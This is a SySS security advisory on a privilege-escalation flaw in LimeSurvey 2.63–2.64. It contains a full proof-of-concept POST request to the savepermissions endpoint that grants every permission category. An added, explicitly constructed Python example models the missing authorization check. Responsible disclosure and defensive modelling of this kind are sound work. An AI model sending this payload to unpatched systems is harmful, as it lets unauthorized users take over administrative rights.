Advisory ID: SYSS-2017-015
Product: LimeSurvey
Manufacturer: LimeSurvey GmbH
Affected Version(s): Version 2.63.1+170305, Version 2.64.0+170307
Tested Version(s): Version 2.63.1+170305, Version 2.64.0+170307
Vulnerability Type: Improper Handling of Insufficient Privileges (CWE-274)
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: 2017-03-24
Solution Date: 2017-05-22
Public Disclosure: 2017-07-26
CVE Reference: Not yet assigned
Author of Advisory: Manuel Stotz & Dr. Erlijn van Genuchten (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The aim of the LimeSurvey application is to support users in setting up surveys (see [1]). This open-source product can be used for both offline and online surveys.

The LimeSurvey application is vulnerable to privilege escalation attacks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

SySS GmbH identified that a user is able to set additional rights for another user. For example, if user A is only allowed to view templates, he is nevertheless able to set additional template rights, such as updating and deleting, for user B. Importantly, user A does not need to hold any permission on users (update, create, etc.) to do so: the permission-saving endpoint does not check whether the requesting user is allowed to manage other users' rights.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

First, an authenticated user sends the following request with the [USERID] of the user whose rights will be changed.
POST /index.php/admin/user/sa/savepermissions HTTP/1.1
Host: [HOST]
Referer: http://[HOST]/index.php/admin/user/sa/setuserpermissions
Cookie: PHPSESSID=[SESSIONID]; YII_CSRF_TOKEN=[TOKEN]
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1114

YII_CSRF_TOKEN=[TOKEN]&all_participantpanel=on&perm_participantpanel_create=on&perm_participantpanel_read=on&perm_participantpanel_update=on&perm_participantpanel_delete=on&perm_participantpanel_import=on&perm_participantpanel_export=on&all_labelsets=on&perm_labelsets_create=on&perm_labelsets_read=on&perm_labelsets_update=on&perm_labelsets_delete=on&perm_labelsets_import=on&perm_labelsets_export=on&all_settings=on&perm_settings_read=on&perm_settings_update=on&perm_settings_import=on&all_surveys=on&perm_surveys_create=on&perm_surveys_read=on&perm_surveys_update=on&perm_surveys_delete=on&perm_surveys_export=on&all_templates=on&perm_templates_create=on&perm_templates_read=on&perm_templates_update=on&perm_templates_delete=on&perm_templates_import=on&perm_templates_export=on&all_usergroups=on&perm_usergroups_create=on&perm_usergroups_read=on&perm_usergroups_update=on&perm_usergroups_delete=on&all_users=on&perm_users_create=on&perm_users_read=on&perm_users_update=on&perm_users_delete=on&perm_superadmin_read=on&all_auth_db=on&perm_auth_db_read=on&action=surveyrights&uid=[USERID]

The consequence is that user B gets the rights of user A. In addition, he obtains all other rights (i.e. updating, deleting, viewing, etc.) within the same category.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Upgrade LimeSurvey to Version 2.65.1 (build 170522) or later.
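The following constructed example (added here; it is not LimeSurvey's code and does not reproduce the vendor's actual fix) models the server-side check the advisory shows missing: it parses the perm_*/all_* form fields of the PoC request and refuses to store them unless the acting user holds the users/update permission. Capping the grant at the actor's own rights is an additional assumed policy of this example.

```python
"""Constructed authorization model for a 'save permissions' handler.
Not LimeSurvey's code: parses the PoC's perm_*/all_* fields and refuses the
change unless the actor may update users (the missing check); capping grants
at the actor's own rights is an assumed extra policy."""
from urllib.parse import parse_qs

ACTIONS = ("create", "read", "update", "delete", "import", "export")


class PermissionDenied(Exception):
    pass


def parse_permission_form(body: str) -> dict[str, set[str]]:
    """Map 'perm_<entity>_<action>=on' and 'all_<entity>=on' fields to
    {entity: {actions}}. 'all_<entity>' expands to every action, which is
    why the PoC hands user B a whole category at once."""
    requested: dict[str, set[str]] = {}
    for key, values in parse_qs(body).items():
        if "on" not in values:
            continue
        if key.startswith("all_"):
            requested.setdefault(key[4:], set()).update(ACTIONS)
        elif key.startswith("perm_"):
            entity, _, action = key[5:].rpartition("_")  # auth_db_read -> (auth_db, read)
            if entity and action in ACTIONS:
                requested.setdefault(entity, set()).add(action)
    return requested


def save_permissions(actor, target_uid, body, store):
    """Server-side check: only a user holding users/update may change another
    user's permissions; the grant is then intersected with the actor's own."""
    if "update" not in actor.get("users", set()):
        raise PermissionDenied("actor lacks permission to update users")
    granted = {}
    for entity, actions in parse_permission_form(body).items():
        allowed = actions & actor.get(entity, set())
        if allowed:
            granted[entity] = allowed
    store[target_uid] = granted
    return granted


def attempt(actor, target_uid, body, store):
    """Wrapper returning (allowed, granted) for callers that prefer no exception."""
    try:
        return True, save_permissions(actor, target_uid, body, store)
    except PermissionDenied:
        return False, None
```

With a template-viewer actor the PoC body is rejected outright; with an actor that may update users, the "all_templates" flag still cannot grant template rights the actor lacks.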
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2017-03-09: Vulnerability discovered
2017-03-24: Vulnerability reported to Manufacturer
2017-05-22: Vulnerability resolved in Version 2.65.1 (build 170522)
2017-07-26: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product web site for LimeSurvey
    https://www.limesurvey.org
[2] SySS Security Advisory SYSS-2017-015
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2017-015.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Manuel Stotz and described by Dr. Erlijn van Genuchten of SySS GmbH.

E-Mail: manuel.stotz@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Manuel_Stotz.asc
Key ID: 0xBCE68C6D
Key Fingerprint: F051 5B74 7E70 193E 7F66 0133 E790 F68A BCE6 8C6D

E-Mail: erlijn.vangenuchten@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Erlijn_van_Genuchten.asc
Key ID: 0xBD96FF2A
Key Fingerprint: 17BB 4CED 755A CBB3 2D47 C563 0CA5 8637 BD96 FF2A

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en